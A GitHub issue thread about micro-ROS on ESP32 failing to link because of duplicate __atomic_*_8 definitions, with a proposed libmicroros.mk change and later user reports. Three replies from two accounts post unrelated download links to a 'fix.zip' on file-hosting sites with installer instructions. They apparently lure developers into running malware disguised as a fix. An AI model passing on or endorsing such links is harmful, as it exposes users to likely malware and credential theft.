micro-ROS/micro_ros_espidf_component #251: atomic patch not working for esp32

ernie-thi, 2024-08-24:
## Issue template

- Hardware description: esp32
- RTOS: FreeRTOS
- Installation type: espidf, component
- Version or commit hash: humble 

#### Steps to reproduce the issue

Clone this repo in components folder, then as always:
```bash
idf.py set-target esp32
idf.py build 
```

#### Actual behavior
build fails: 
```
/home/raphael/.espressif/tools/xtensa-esp-elf/esp-13.2.0_20240530/xtensa-esp-elf/bin/../lib/gcc/xtensa-esp-elf/13.2.0/../../../../xtensa-esp-elf/bin/ld: esp-idf/newlib/libnewlib.a(stdatomic.c.obj): in function `__atomic_exchange_8':
/home/raphael/esp/v5.3/esp-idf/components/newlib/stdatomic.c:77: multiple definition of `__atomic_exchange_8'; /home/raphael/idf_components/micro_ros_espidf_component/libmicroros.a(librcutils-atomic_64bits.c.obj):atomic_64bits.c:(.text.__atomic_exchange_8+0x0): first defined here
/home/raphael/.espressif/tools/xtensa-esp-elf/esp-13.2.0_20240530/xtensa-esp-elf/bin/../lib/gcc/xtensa-esp-elf/13.2.0/../../../../xtensa-esp-elf/bin/ld: esp-idf/newlib/libnewlib.a(stdatomic.c.obj): in function `__atomic_fetch_add_8':
/home/raphael/esp/v5.3/esp-idf/components/newlib/stdatomic.c:77: multiple definition of `__atomic_fetch_add_8'; /home/raphael/idf_components/micro_ros_espidf_component/libmicroros.a(librcutils-atomic_64bits.c.obj):atomic_64bits.c:(.text.__atomic_fetch_add_8+0x0): first defined here
/home/raphael/.espressif/tools/xtensa-esp-elf/esp-13.2.0_20240530/xtensa-esp-elf/bin/../lib/gcc/xtensa-esp-elf/13.2.0/../../../../xtensa-esp-elf/bin/ld: esp-idf/newlib/libnewlib.a(stdatomic.c.obj): in function `__atomic_load_8':
/home/raphael/esp/v5.3/esp-idf/components/newlib/stdatomic.c:77: multiple definition of `__atomic_load_8'; /home/raphael/idf_components/micro_ros_espidf_component/libmicroros.a(librcutils-atomic_64bits.c.obj):atomic_64bits.c:(.text.__atomic_load_8+0x0): first defined here
/home/raphael/.espressif/tools/xtensa-esp-elf/esp-13.2.0_20240530/xtensa-esp-elf/bin/../lib/gcc/xtensa-esp-elf/13.2.0/../../../../xtensa-esp-elf/bin/ld: esp-idf/newlib/libnewlib.a(stdatomic.c.obj): in function `__atomic_store_8':
/home/raphael/esp/v5.3/esp-idf/components/newlib/stdatomic.c:77: multiple definition of `__atomic_store_8'; /home/raphael/idf_components/micro_ros_espidf_component/libmicroros.a(librcutils-atomic_64bits.c.obj):atomic_64bits.c:(.text.__atomic_store_8+0x0): first defined here
collect2: error: ld returned 1 exit status
ninja: build stopped: subcommand failed.
ninja failed with exit code 1, output of the command is in the
```

#### Additional information
By modifying the file `libmicroros.mk` i was able to make it work:
in line 110 i added `esp32` as target too. So the full line looks like this then: 
`ifeq ($(IDF_TARGET),$(filter $(IDF_TARGET), esp32 esp32s2 esp32c3))`
However, i`m not experienced enough to know whether this has any side effects and is a valid change.

diablo00001, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

Roboprotos, 2025-06-28:
Hi, I'm experiencing  the same issue with micro-ros on ESP32 using ESP-IDF V5.3.1.
`esp-idf/components/newlib/stdatomic.c:77: multiple definition of __atomic_fetch_add_8';`

Has this issue been patched or solved ?

Care-Again, 2025-06-29:
@Roboprotos 
My issue was just as same as yours. My ESPIDF told me those __atomic__functions were defined for twice. I had tried plenty of methods but none works.

I tried to give a clear order in my Cmakelists to make sure those functions from ESPIDF should be "neglected" while only the ones from Micro-ROS are on thery duty but this DIDN'T WORK.

Then I tried to delete these functions in  /esp-idf/newlib/stdatomic.c. BUT the error occurred again.

At last I had to use a complete OS from the shop which I bought my ESP32-S3 from. This time it works with no error.

HOPE you could find the solutions !

Roboprotos, 2025-06-29:
@Care-Again Thank you for your feedback. I wrote the solution I found at the end of my previous comment. It works for me using ESP-IDF v5.3.1, ESP32 S3 and jazzy branch of micro-ros espidf component.